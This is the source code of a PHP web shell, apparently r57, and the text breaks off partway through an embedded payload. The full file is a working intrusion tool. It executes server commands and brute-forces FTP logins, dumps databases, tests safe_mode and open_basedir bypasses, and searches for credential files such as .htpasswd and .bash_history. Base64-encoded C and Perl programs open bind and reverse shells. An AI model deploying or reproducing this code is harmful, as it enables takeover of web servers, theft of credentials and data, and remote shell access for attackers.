'; die(); } $lang=array( 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', 'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_butt3' =>'???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_butt4' =>'?????????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_butt5' =>'?????????', 'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_butt6' =>'???????', 'ru_text30'=>'???????? ?????', 'ru_butt7' =>'???????', 'ru_text31'=>'???? ?? ??????', 'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', 'ru_butt8' =>'?????????', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'????', 'ru_text37'=>'?????', 'ru_text38'=>'??????', 'ru_text39'=>'???????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_butt9' =>'????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_butt12'=>'?????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', 'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_butt13'=>'???????/???????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>'?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)', 'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text77'=>'???????? ????????? ???? ??????', 'ru_text78'=>'?????????? ???????', 'ru_text79'=>'?????????? ???????', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', 'ru_text86'=>'?????????? ????? ? ???????', 'ru_butt14'=>'???????', 'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'FTP-??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????????', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_butt15'=>'?????????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', /* --------------------------------------------------------------- */ 'eng_text1' =>'Executed command', 'eng_text2' =>'Execute command on server', 'eng_text3' =>'Run command', 'eng_text4' =>'Work directory', 'eng_text5' =>'Upload files on server', 'eng_text6' =>'Local file', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_butt1' =>'Execute', 'eng_butt2' =>'Upload', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_butt3' =>'Bind', 'eng_text12'=>'back-connect', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_butt4' =>'Connect', 'eng_text15'=>'Upload files from remote server', 'eng_text16'=>'With', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Use', 'eng_text21'=>' New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Use', 'eng_butt5' =>'Run', 'eng_text28'=>'Work in safe_mode', 'eng_text29'=>'ACCESS DENIED', 'eng_butt6' =>'Change', 'eng_text30'=>'Cat file', 'eng_butt7' =>'Show', 'eng_text31'=>'File not found', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'Test', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database', 'eng_text37'=>'Login', 'eng_text38'=>'Password', 'eng_text39'=>'Table', 'eng_text40'=>'Dump database table', 'eng_butt9' =>'Dump', 'eng_text41'=>'Save dump in file', 'eng_text42'=>'Edit files', 'eng_text43'=>'File for edit', 'eng_butt10'=>'Save', 'eng_text44'=>'Can\'t edit file! Only read access!', 'eng_text45'=>'File saved', 'eng_text46'=>'Show phpinfo()', 'eng_text47'=>'Show variables from php.ini', 'eng_text48'=>'Delete temp files', 'eng_butt11'=>'Edit file', 'eng_text49'=>'Delete script from server', 'eng_text50'=>'View cpu info', 'eng_text51'=>'View memory info', 'eng_text52'=>'Find text', 'eng_text53'=>'In dirs', 'eng_text54'=>'Find text in files', 'eng_butt12'=>'Find', 'eng_text55'=>'Only in files', 'eng_text56'=>'Nothing :(', 'eng_text57'=>'Create/Delete File/Dir', 'eng_text58'=>'name', 'eng_text59'=>'file', 'eng_text60'=>'dir', 'eng_butt13'=>'Create/Delete', 'eng_text61'=>'File created', 'eng_text62'=>'Dir created', 'eng_text63'=>'File deleted', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Create', 'eng_text66'=>'Delete', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Command', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>'Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...', 'eng_text72'=>'Text for find', 'eng_text73'=>'Find in folder', 'eng_text74'=>'Find in files', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text77'=>'Show database structure', 'eng_text78'=>'show tables', 'eng_text79'=>'show columns', 'eng_text80'=>'Type', 'eng_text81'=>'Net', 'eng_text82'=>'Databases', 'eng_text83'=>'Run SQL query', 'eng_text84'=>'SQL query', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Download files from server', 'eng_butt14'=>'Download', 'eng_text87'=>'Download files from remote ftp-server', 'eng_text88'=>'FTP-server:port', 'eng_text89'=>'File on ftp', 'eng_text90'=>'Transfer mode', 'eng_text91'=>'Archivation', 'eng_text92'=>'without archivation', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Users list', 'eng_text96'=>'Can\'t get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'* use username from /etc/passwd for ftp login and password', 'eng_text100'=>'Send file to remote ftp server', 'eng_text101'=>'Use reverse (user -> resu) login for password', 'eng_text102'=>'Mail', 'eng_text103'=>'Send email', 'eng_text104'=>'Send file to email', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_butt15'=>'Send', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Show', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name 'config*'', 'find config* files in current dir'=>'find . -type f -name 'config*'', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd', 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an | grep -i listen', '----------------------------------------------------------------------------------------------------'=>'ls -la' ); $table_up1 = '
:: '; $table_up2 = ' ::
'; $table_up3 = ''; $arrow = ' ?'; $lb = '['; $rb = ']'; $font = ''; $ts = '
'; $table_end1 = '
'; $te = '
'; $fs = '
'; $fe = '
'; if(isset($_GET['users'])) { if(!$users=get_users()) { echo '
'.$lang[$language.'_text96'].'
'; } else { echo '
'; foreach($users as $user) { echo $user.'
'; } echo '
'; } echo '
[ BACK ]
'; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==':') $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ='-'; $unix=1; } else { if(@eregi('^win',$os)) { $windows = 1; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == 'search_text') { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ''; if($found > 0) { $r .= ''; foreach($res as $file=>$v) { $r .= ''; $r .= ''; foreach($v as $a=>$b) { $r .= ''; $r .= ''; $r .= ''; $r .= '\n'; } } $r .= '
'.ws(3); $r .= ($windows)? str_replace('/','\\',$file) : $file; $r .= ''; $r .= '
'.$a.''.ws(2).$b.'
'; echo $r; } else { echo '

'.$lang[$language.'_text56'].'

'; } echo '
[ BACK ]
'; die(); } if(strpos(ex('echo abcr57'),'r57')!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = '-'; } function ws($i) { return @str_repeat(' ',$i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join('\n',$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,'r'))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(':',$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=='ru'){ $text = '??????! ?? ???? ???????? ? ???? '; } else { $text = '[-] ERROR! Can't write in file '; } echo '
'.$text.$i.'
'; return null; } function re($i) { if($GLOBALS['language']=='ru'){ $text = '??????! ?? ???? ????????? ???? '; } else { $text = '[-] ERROR! Can't read file '; } echo '
'.$text.$i.'
'; return null; } function ce($i) { if($GLOBALS['language']=='ru'){ $text = '?? ??????? ??????? '; } else { $text = 'Can't create '; } echo '
'.$text.$i.'
'; return null; } function fe($l,$n) { $text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); echo '
'.$text[$l][$n].'
'; return null; } function mr($l,$n) { $text['ru'] = array('?? ??????? ????????? ??????','?????? ??????????'); $text['eng'] = array('Can\'t send mail','Mail sent'); echo '
'.$text[$l][$n].'
'; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner['read'] = ($mode & 00400) ? 'r' : '-'; $owner['write'] = ($mode & 00200) ? 'w' : '-'; $owner['execute'] = ($mode & 00100) ? 'x' : '-'; $group['read'] = ($mode & 00040) ? 'r' : '-'; $group['write'] = ($mode & 00020) ? 'w' : '-'; $group['execute'] = ($mode & 00010) ? 'x' : '-'; $world['read'] = ($mode & 00004) ? 'r' : '-'; $world['write'] = ($mode & 00002) ? 'w' : '-'; $world['execute'] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner['execute'] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group['execute'] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world['execute'] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf('%1s', $type); $s.=sprintf('%1s%1s%1s', $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf('%1s%1s%1s', $group['read'], $group['write'], $group['execute']); $s.=sprintf('%1s%1s%1s', $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value) { $ret = ''; return $ret; } function which($pr) { $path = ex('which $pr'); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,'w') or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return ''.$t1.''.$t2.''; } if (!@function_exists('view_size')) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . ' GB';} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . ' MB';} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . ' KB';} else {$size = $size . ' B';} return $size; } } function DirFiles($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (FALSE !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(!is_dir($dir.'/'.$file)) { if($types) { $pos = @strrpos($file,'.'); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,@explode(';',$types))) $files[] = $dir.'/'.$file; } else $files[] = $dir.'/'.$file; } } } @closedir($handle); } return $files; } function DirFilesWide($dir) { $files = Array(); $dirs = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(@is_dir($dir.'/'.$file)) { $file = @strtoupper($file); $dirs[$file] = '<DIR>'; } else $files[$file] = @filesize($dir.'/'.$file); } } @closedir($handle); @ksort($dirs); @ksort($files); $files = @array_merge($dirs,$files); } return $files; } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(@is_dir($dir.'/'.$file)) $files = @array_merge($files,DirFilesR($dir.'/'.$file,$types)); else { $pos = @strrpos($file,'.'); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir.'/'.$file; } else $files[] = $dir.'/'.$file; } } } @closedir($handle); } return $files; } function DirPrintHTMLHeaders($dir) { $pockets = ''; $handle = @opendir($dir) or die('Can't open directory $dir'); echo '
    \n'; while (false !== ($file = @readdir($handle))) { if ($file != '.' && $file != '..') { if(@is_dir($dir.'/'.$file)) { echo '
  • [ $file ]
  • \n'; DirPrintHTMLHeaders($dir.'/'.$file); } else { $pos = @strrpos($file,'.'); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,array('.htm','.html'))) { $header = '-=None=-'; $strings = @file($dir.'/'.$file) or die('Can't open file '.$dir.'/'.$file); for($a=0;$a'.$header.'\n'; } } } } echo '
\n'; @closedir($handle); } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(';',$dir); $this->FilesToSearch = Array(); for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = '\b'.$v.'\b'; $words = '('.@implode($delim,$qq).')'; $pattern = '/'.$words.'/'; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,'\\1',$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(' ',@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c='I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0='; $port_bind_bd_pl='IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9'; $back_connect='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=='; $back_connect_c='I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=='; $datapipe_c='I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy 